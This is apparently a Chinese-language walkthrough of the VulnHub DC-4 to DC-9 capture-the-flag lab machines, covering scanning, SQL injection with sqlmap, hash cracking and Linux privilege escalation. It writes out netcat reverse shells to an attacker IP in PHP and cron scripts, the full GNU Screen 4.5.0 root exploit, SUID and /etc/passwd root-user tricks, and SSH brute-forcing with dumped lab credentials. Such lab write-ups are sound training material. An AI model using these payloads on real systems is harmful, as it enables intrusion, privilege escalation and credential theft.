888 888 888 888 8888888b. 888 888 888 888 888 o 888 888 888 888 "Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888 88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " " 888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888 Congratulations!!! Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges. If you enjoyed this CTF, send me a tweet via @DCAU7.
寫入定時文件/etc/crontab
向/etc/crontab文件中寫入新的定時任務
時間部分所有填寫爲*,意思是每分鐘執行一次,經過寫入將/bin/sh的權限修改成4777,這樣就能夠在非root用戶下執行它,而且執行期間擁有root權限。
sudo teehee /etc/crontab * * * * * root chmod 4777 /bin/sh
參考文章
http://www.javashuo.com/article/p-ganpvbvi-nw.html
DC5
基本環境的搭建
靶機下載地址:https://download.vulnhub.com/dc/DC-5.zip
基本信息收集
nmap -sS -A 192.168.124.0/24
Nmap scan report for 192.168.124.149 Host is up (0.00027s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 80/tcp open http nginx 1.6.2 |_http-server-header: nginx/1.6.2 |_http-title: Welcome 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 37412/udp status | 100024 1 49448/tcp6 status | 100024 1 49885/udp6 status |_ 100024 1 56530/tcp status MAC Address: 00:0C:29:1A:8C:74 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.27 ms 192.168.124.149 Nmap scan report for 192.168.124.254
發現開了80,111端口,操做系統是linux,nginx 1.6.2
對端口進一步探測
nmap -sS 192.168.124.149 -p 1-65535
Nmap scan report for 192.168.124.149 Host is up (0.00089s latency). Not shown: 65532 closed ports PORT STATE SERVICE 80/tcp open http 111/tcp open rpcbind 56530/tcp open unknown MAC Address: 00:0C:29:1A:8C:74 (VMware) Nmap done: 1 IP address (1 host up) scanned in 2.46 seconds
開了56530端口
進入80端口查看
發現一個留言功能
嘗試了xss發現並無
掃描一下目錄,發現特別的footer.php
訪問發現日期總在變
發現留言的地方的日期也總在變
而後thankyou.php應該是包含了footer.php頁面
嘗試文件包含讀取thankyou.php文件和其餘文件,發現可以成功讀取
嘗試寫入文件進行文件包含,能寫入的文件像中間件日誌文件,ssh登陸的日誌文件,臨時文件等等
參考以前的文件包含https://lnng.top/posts/6b68.html
這個仍是嘗試包含中間件的日誌文件吧,由於ssh的登陸端口不知,且其餘的方法很差利用
隨便訪問一個木馬
蟻劍鏈接發現鏈接成功
反彈交互shell
在/var/tmp/下新建phpshell文件,寫入
<?php
system("nc 192.168.124.139 4444 -e /bin/sh");
?>
kali端
nc -l -p 4444
反彈shell
python -c 'import pty;pty.spawn("/bin/bash")'
提權
嘗試suid提權
find / -perm -u=s -type f 2>/dev/null
GNU Screen是一款由GNU計劃開發的用於命令行終端切換的自由軟件。用戶能夠經過該軟件同時鏈接多個本地或遠程的命令行會話,並在其間自由切換。
GNU Screen能夠看做是窗口管理器的命令行界面版本。它提供了統一的管理多個會話的界面和相應的功能。
搜索漏洞
searchsploit screen 4.5.0
發現兩個可利用的漏洞
使用第一個
先將41154.sh複製到桌面
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh cat 41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
這裏告訴了咱們使用方法
先將第一部分寫入libhax.c文件中
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
而後編譯
gcc -fPIC -shared -ldl -o libhax.so libhax.c
將中間的代碼存入rootshell.c中
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
而後編譯
gcc -o rootshell rootshell.c
將剩餘代碼保存到dc5.sh
echo "[+] Now we create our /etc/ld.so.preload file..." cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed echo "[+] Triggering..." screen -ls # screen itself is setuid, so... /tmp/rootshell
並輸入:
set ff=unix
將三個文件上傳到/tmp文件中
而後修改dc5.sh的權限
chmod 777 dc5.sh
而後執行
./dc5.sh
讀取flag
cat thisistheflag.txt
888b 888 d8b 888 888 888 888
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888
Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)
I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.
參考文章
https://www.jianshu.com/p/8f6e1e4d44b9
https://www.anquanke.com/post/id/178958
DC6
基本環境搭建
靶機下載地址:https://download.vulnhub.com/dc/DC-6.zip
基本信息收集
nmap -sS -A 192.168.124.0/24
Nmap scan report for 192.168.124.150 Host is up (0.00049s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA) | 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA) |_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Did not follow redirect to http://wordy/ |_https-redirect: ERROR: Script execution failed (use -d to debug) MAC Address: 00:0C:29:4C:2C:9C (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.49 ms 192.168.124.150
發現開放了80,22ssh端口,操做系統linux
對端口進一步掃描
nmap -sS 192.168.124.150 -p 1-65535
Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
沒有新的端口
爆破一下ssh(爆破未成功)
nmap --script=ssh-brute 192.168.124.150
訪問80端口
發現80端口訪問不了,被重定向的wordy頁面和以前同樣
修改本地的dns
linux: vim /etc/hosts windows: C:\Windows\System32\drivers\etc
添加
192.168.124.150 wordy
根據我的ip
插件識別是一個wordpress+apache環境
那和以前同樣用wpscan掃描
wpscan --url http://wordy/ --enumerate u
掃描出幾個用戶名
將其保存到usename.txt文件
而後有個提示媽耶鬼能想到
提示地址:https://www.vulnhub.com/entry/dc-6,315/
cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt
而後進行爆破
wpscan --url http://wordy/ -U username.txt -P password.txt
成功爆破出帳號和密碼
mark / helpdesk01
登陸地址
http://wordy/wp-admin/
搜索漏洞:
https://www.exploit-db.com/exploits/45274
發現一個命令執行,漏洞地址
http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools
kali開啓監聽端口
netcat -l -p 4444
這個位置修改命令執行反彈shell
baidu.com | nc -e /bin/bash 192.168.124.139 4444
反彈一下交互shell
python -c 'import pty;pty.spawn("/bin/bash")'
提權
在家目錄發現提示的ssh登陸
/home/mark/stuff
發現登陸帳號密碼
Things to do: - Restore full functionality for the hyperdrive (need to speak to Jens) - Buy present for Sarah's farewell party - Add new user: graham - GSo7isUM1D4 - done - Apply for the OSCP course - Buy new laptop for Sarah's replacement
ssh登陸
嘗試suid提取,發現沒有可利用的
find / -perm -u=s -type f 2>/dev/null
查看當前用戶可執行操做
sudo -l
發現可操做/home/jens/backups.sh,打開發現是一個解壓的腳本
向其中寫入命令而後已jens來執行
echo "/bin/bash" >> /home/jens/backups.sh sudo -u jens /home/jens/backups.sh
發現成功切換到jens用戶
繼續查看可執行的命令,發現可執行的root的nmap
sudo -l
因此須要nmap打開一個shell便可得到root
nmap中執行shell方法
echo "os.execute('/bin/bash')">/tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
cat ./theflag.txt
成功得到flag
Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"' YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8) Congratulations!!! Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges. If you enjoyed this CTF, send me a tweet via @DCAU7.
DC7
基本環境搭建
靶機下載地址:https://download.vulnhub.com/dc/DC-7.zip
基本信息收集
nmap -sS -A 192.168.124.0/24
Nmap scan report for 192.168.124.151 Host is up (0.00037s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA) | 256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA) |_ 256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-generator: Drupal 8 (https://www.drupal.org) | http-robots.txt: 22 disallowed entries (15 shown) | /core/ /profiles/ /README.txt /web.config /admin/ | /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ | /user/password/ /user/login/ /user/logout/ /index.php/admin/ |_/index.php/comment/reply/ |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Welcome to DC-7 | D7 MAC Address: 00:0C:29:52:A9:5B (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.37 ms 192.168.124.151
發現開放了22,80端口系統linux,進一步掃描,沒發現其餘端口
nmap 192.168.124.151 -p 1-65535
爆破ssh
nmap --script=ssh-brute 192.168.124.151
查看80端口進行進一步信息的探測CMS是Drupal8,並且告訴咱們不是暴力破解
查找漏洞
嘗試了msf中的漏洞不行exploit-db中根據版原本也不行
百度一下說這個提示搜索一下這我的,而後發現了github,而後找到了源碼github源碼地址
而後咱們在config.php中發現了鏈接數據庫的帳號密碼,嘗試使用ssh鏈接,能夠看到爆破前面爆破帳號密碼失敗
<?php $servername = "localhost"; $username = "dc7user"; $password = "MdR3xOgB7#dW"; $dbname = "Staff"; $conn = mysqli_connect($servername, $username, $password, $dbname); ?>
提取
先搜尋一下文件的基本信息,在mbox中發現一個root執行的文件(百度的媽耶看不到)
cat mbox
cat /opt/scripts/backups.sh #!/bin/bash rm /home/dc7user/backups/* cd /var/www/html/ drush sql-dump --result-file=/home/dc7user/backups/website.sql cd .. tar -czf /home/dc7user/backups/website.tar.gz html/ gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz chown dc7user:dc7user /home/dc7user/backups/* rm /home/dc7user/backups/website.sql rm /home/dc7user/backups/website.tar.gz
發現應該是一個備份的sh腳本
看一下權限www-data和root都是有權限的
因此有思路了,若是咱們得到www-data的權限向這個腳本執行任務,那麼咱們就能夠反彈root權限,由於會以root權限定時啓動
看着這個備份腳本能夠發現是一個drush配置的命令,它能夠改變用戶名密碼
drush sql-dump --result-file=/home/dc7user/backups/website.sql
因此嘗試修改一下密碼
cd /var/www/html drush user-password admin --password="123456"
登陸嘗試,登陸成功
發現這個位置是支持擴展的,因此咱們想要建立一個webshell能夠藉助插件,看wp要去下載一個php的插件
插件下載地址:https://www.drupal.org/project/php
下載gz格式上傳,而後點如圖的標識
而後勾上下圖的東西,點擊最下方的install
回到主頁,點擊下圖的東西,建立一個文章
隨便寫個木馬
注意下面的text format要選擇php code
而後蟻劍鏈接便可
再反彈給kali吧,其實能夠直接再webshell中反彈shell
反彈交互shell
python -c 'import pty;pty.spawn("/bin/bash")'
而後將反彈shell的腳本寫入定時啓動的sh中,反彈root的shell
echo "nc -e /bin/bash 192.168.124.139 7777" >> /opt/scripts/backups.sh
讀取flag
cd /root ls theflag.txt cat theflag.txt 888 888 888 888 8888888b. 888 888 888 888 888 o 888 888 888 888 "Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888 88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " " 888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888 Congratulations!!! Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those who have provided feedback, and all those who have taken the time to complete these little challenges. I'm sending out an especially big thanks to: @4nqr34z @D4mianWayne @0xmzfr @theart42 If you enjoyed this CTF, send me a tweet via @DCAU7.
參考文章
https://www.anquanke.com/post/id/187876#h3-3
DC8
基本環境搭建
靶機下載地址:https://download.vulnhub.com/dc/DC-8.zip
基本信息收集
Nmap scan report for 192.168.124.152 Host is up (0.00058s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA) | 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA) |_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519) 80/tcp open http Apache httpd |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache |_http-title: Welcome to DC-8 | DC-8 MAC Address: 00:0C:29:AE:A9:C3 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.58 ms 192.168.124.152
查看發現了80,22端口,操做系統linux
進一步掃描,沒發現其餘端口
nmap 192.168.124.152 -p 1-65535
爆破ssh,無結果
nmap --script=ssh-brute 192.168.124.152
查看80端,cms Drupal 7
漏洞利用
msf上的基本漏洞利用沒效果,這裏發現id嘗試一下sql注入吧
先嚐試簡單的報錯注入吧,沒有任何防禦直接注入
sqlmap一把梭哈
http://192.168.124.152/?nid=1%20and%20updatexml(1,concat(0x7e,database()),1)# sqlmap -u http://192.168.124.152/?nid=1 -D d7db -T users --dump
成功報出,帳號密碼的hash值
05:16:06] [INFO] resumed: 'admin'
[05:16:06] [INFO] resumed: '1567489015'
[05:16:06] [INFO] resumed: 'dc8blah@dc8blah.org'
[05:16:06] [INFO] resumed: '1567766626'
[05:16:06] [INFO] resumed: 'dcau-user@outlook.com'
[05:16:06] [INFO] resumed: '$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z'
[05:16:06] [INFO] resumed: '0'
[05:16:06] [INFO] resumed: ''
[05:16:06] [INFO] resumed: 'filtered_html'
[05:16:06] [INFO] resumed: '1'
[05:16:06] [INFO] resumed: ''
[05:16:06] [INFO] resumed: 'Australia/Brisbane'
[05:16:06] [INFO] resumed: '1'
[05:16:06] [INFO] resumed: '1567498512'
[05:16:06] [INFO] resumed: 'a:5:{s:16:"ckeditor_default";s:1:"t";s:20:"ckeditor_show_toggle";s:1:"t";s:14:"ckeditor_width";s:4:...
[05:16:06] [INFO] resumed: ''
[05:16:06] [INFO] resumed: 'john'
[05:16:06] [INFO] resumed: '1567489250'
[05:16:06] [INFO] resumed: 'john@blahsdfsfd.org'
[05:16:06] [INFO] resumed: '1567497783'
[05:16:06] [INFO] resumed: 'john@blahsdfsfd.org'
[05:16:06] [INFO] resumed: '$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'
[05:16:06] [INFO] resumed: '0'
[05:16:06] [INFO] resumed: ''
爆破一下hash值,使用john這裏提示了
爆破成功了john的密碼turtle
C:\root\Desktop> john pass.txt Using default input encoding: UTF-8 Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 AVX 2x]) No password hashes left to crack (see FAQ) C:\root\Desktop> john --show pass.txt john:turtle 1 password hash cracked, 0 left
掃描一下目錄
dirb http://192.168.124.152
發現user目錄是登陸的地方
登陸成功,發現這個位置能夠添加php代碼,直接嘗試反彈shell
http://192.168.124.152/node/3#overlay=node/3/webform/configure
<p>flag</p>
<?php
system("nc -e /bin/sh 192.168.124.139 4444");
?>
而後這個頁面隨便輸出什麼點擊提交等待反彈的shell
而後反彈交互shell
python -c 'import pty;pty.spawn("/bin/bash")'
提權
先嚐試suid提權
find / -perm -u=s -type f 2>/dev/null
www-data@dc-8:/var/www/html$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /usr/bin/chfn /usr/bin/gpasswd /usr/bin/chsh /usr/bin/passwd /usr/bin/sudo /usr/bin/newgrp /usr/sbin/exim4 /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /bin/ping /bin/su /bin/umount /bin/mount
發現一個特別的exim4搜索一下漏洞
嘗試一下這個漏洞
先複製出來
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh
處理爲unix能夠的
開啓一個服務或者你蟻劍鏈接上傳
python -m SimpleHTTPServer
而後下載下來
wget http://192.168.124.139:8000/46996.sh
裏面有使用說明
chmod 777 46996.sh ./46996.sh -m netcat
Brilliant - you have succeeded!!! 888 888 888 888 8888888b. 888 888 888 888 888 o 888 888 888 888 "Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888 88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " " 888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888 Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those who have provided feedback, and all those who have taken the time to complete these little challenges. I'm also sending out an especially big thanks to: @4nqr34z @D4mianWayne @0xmzfr @theart42 This challenge was largely based on two things: 1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile. 2. A suggestion from @theart42 The answer to that question is... If you enjoyed this CTF, send me a tweet via @DCAU7.
參考文章
https://blog.csdn.net/weixin_43583637/article/details/102828013
https://fan497.top/2020/11/17/vulnhub-DC8/
DC9
基本環境搭建
靶機下載地址:https://download.vulnhub.com/dc/DC-9.zip
基本信息收集
nmap -sS -A 192.168.124.0/24
Nmap scan report for 192.168.124.153 Host is up (0.00041s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp filtered ssh 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Example.com - Staff Details - Welcome MAC Address: 00:0C:29:20:FE:11 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.41 ms 192.168.124.153
開放了80,22ssh,操做系統linux
端口的進一步掃描(沒發現新的端口)
nmap 192.168.124.153 -p 1-65535
爆破一下ssh
nmap --script=ssh-brute 192.168.124.153
查看80端口,說讓咱們看看你其餘目錄
測試了一下manage功能彷佛沒有啥問題,再search的地方發現了sql注入
sqlmap直接跑一下,跑出三個數據庫
sqlmap -u "http://192.168.124.153/results.php" --data "search=" --dbs
繼續跑表
users的
sqlmap -u "http://192.168.124.153/results.php" --data "search=" -D users --tables
sqlmap -u "http://192.168.124.153/results.php" --data "search=" -D users -T UserDetails --dump
+------+------------+---------------------+-----------+-----------+---------------+ | id | lastname | reg_date | username | firstname | password | +------+------------+---------------------+-----------+-----------+---------------+ | 17 | Morrison | 2019-12-29 16:58:28 | janitor2 | Scott | Hawaii-Five-0 | | 16 | Trump | 2019-12-29 16:58:26 | janitor | Donald | Ilovepeepee | | 15 | McScoots | 2019-12-29 16:58:26 | scoots | Scooter | YR3BVxxxw87 | | 14 | Buffay | 2019-12-29 16:58:26 | phoebeb | Phoebe | smellycats | | 13 | Geller | 2019-12-29 16:58:26 | monicag | Monica | 3248dsds7s | | 12 | Geller | 2019-12-29 16:58:26 | rossg | Ross | ILoveRachel | | 11 | Green | 2019-12-29 16:58:26 | rachelg | Rachel | yN72#dsd | | 10 | Tribbiani | 2019-12-29 16:58:26 | joeyt | Joey | Passw0rd | | 9 | Bing | 2019-12-29 16:58:26 | chandlerb | Chandler | UrAG0D! | | 8 | Rubble | 2019-12-29 16:58:26 | bettyr | Betty | BamBam01 | | 7 | Flintstone | 2019-12-29 16:58:26 | wilmaf | Wilma | Pebbles | | 6 | Mouse | 2019-12-29 16:58:26 | jerrym | Jerry | B8m#48sd | | 5 | Cat | 2019-12-29 16:58:26 | tomc | Tom | TC&TheBoyz | | 4 | Rubble | 2019-12-29 16:58:26 | barneyr | Barney | RocksOff | | 3 | Flintstone | 2019-12-29 16:58:26 | fredf | Fred | 4sfd87sfd1 | | 2 | Dooley | 2019-12-29 16:58:26 | julied | Julie | 468sfdfsd2 | | 1 | Moe | 2019-12-29 16:58:26 | marym | Mary | 3kfs86sfd
Staff的
sqlmap -u "http://192.168.124.153/results.php" --data "search=" -D Staff --tables
報出了倆表
Database: Staff [2 tables] +--------------+ | StaffDetails | | Users | +--------------+
sqlmap -u "http://192.168.124.153/results.php" --data "search=" -D Staff -T Users --dump
Users的表
Database: Staff Table: Users [1 entry] +--------+----------+----------------------------------+ | UserID | Username | Password | +--------+----------+----------------------------------+ | 1 | admin | 856f5de590ef37314e7c3bdf6f8a66dc | +--------+----------+----------------------------------+
StaffDetails的表
sqlmap -u "http://192.168.124.153/results.php" --data "search=" -D Staff -T StaffDetails --dump
Database: Staff Table: StaffDetails [17 entries] +------+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+ | id | email | phone | lastname | reg_date | firstname | position | +------+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+ | 2 | julied@example.com | 46457131654 | Dooley | 2019-05-01 17:32:00 | Julie | Human Resources | | 17 | janitor2@example.com | 47836546413 | Morrison | 2019-12-24 03:41:04 | Scott | Assistant Replacement Janitor | | 15 | scoots@example.com | 454786464 | McScoots | 2019-05-01 20:16:33 | Scooter | Resident Cat | | 13 | monicag@example.com | 8092432798 | Geller | 2019-05-01 17:32:00 | Monica | Marketing | | 11 | rachelg@example.com | 823897243978 | Green | 2019-05-01 17:32:00 | Rachel | Personal Assistant | | 9 | chandlerb@example.com | 189024789 | Bing | 2019-05-01 17:32:00 | Chandler | President - Sales | | 7 | wilmaf@example.com | 243457487 | Flintstone | 2019-05-01 17:32:00 | Wilma | Accounts | | 5 | tomc@example.com | 802438797 | Cat | 2019-05-01 17:32:00 | Tom | Driver | | 3 | fredf@example.com | 46415323 | Flintstone | 2019-05-01 17:32:00 | Fred | Systems Administrator | | 1 | marym@example.com | 46478415155456 | Moe | 2019-05-01 17:32:00 | Mary | CEO | | 16 | janitor@example.com | 65464646479741 | Trump | 2019-12-23 03:11:39 | Donald | Replacement Janitor | | 14 | phoebeb@example.com | 43289079824 | Buffay | 2019-05-01 17:32:02 | Phoebe | Assistant Janitor | | 12 | rossg@example.com | 6549638203 | Geller | 2019-05-01 17:32:00 | Ross | Instructor | | 10 | joeyt@example.com | 232131654 | Tribbiani | 2019-05-01 17:32:00 | Joey | Janitor | | 8 | bettyr@example.com | 90239724378 | Rubble | 2019-05-01 17:32:00 | Betty | Junior Accounts | | 6 | jerrym@example.com | 24342654756 | Mouse | 2019-05-01 17:32:00 | Jerry | Stores | | 4 | barneyr@example.com | 324643564 | Rubble | 2019-05-01 17:32:00 | Barney | Help Desk | +------+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
MD5解碼一下password的密碼
856f5de590ef37314e7c3bdf6f8a66dc
密碼
transorbital1
嘗試登陸,登陸成功,發現這裏提示File does not exist,估計是包含了某個文件,嘗試文件包含,發現確實存在文件包含
而後看來大佬的wp,發現一個沒了解的地方
http://192.168.124.153/welcome.php?file=../../../../../../../../../etc/knockd.conf
也就是說黑客進行直接掃描端口掃描不出來,只有進行固定knockd的訪問才能打開
查看配置文件發現須要連續訪問的端口
[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
輪流敲
nmap 192.168.124.153 -p 7469 nmap 192.168.124.153 -p 8475 nmap 192.168.124.153 -p 9842
將以前爆破的users的帳號密碼,提權出來進行ssh的爆破
cat UserDetails.csv | awk -F ',' '{print $4}' > username.txt
cat UserDetails.csv | awk -F ',' '{print $NF}' > password.txt
爆破ssh
hydra破解進行破解
hydra -L username.txt -P password.txt 192.168.124.153 ssh
成功爆破出三個用戶
登陸janitor發現了隱藏文件
將其加入到password中再次進行爆破
成功多爆破出一個帳號密碼嘗試登陸
看一下權限
sudo -l
發現一個test文件
執行了一下發現執行不了
再上一層目錄發現了源碼
代碼的意思是將第一個文件的內容寫入第二個文件中
因此咱們能夠建立一個文件寫入root權限的信息,而後用test將其寫入到/etc/passwd中
echo "admin:*:0:0:::/bin/bash" >> /tmp/passwd
而後利用test將/tmp/passwd的內容寫入到/etc/passwd中
sudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin
root@dc-9:/opt/devstuff/dist/test# whoami
root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
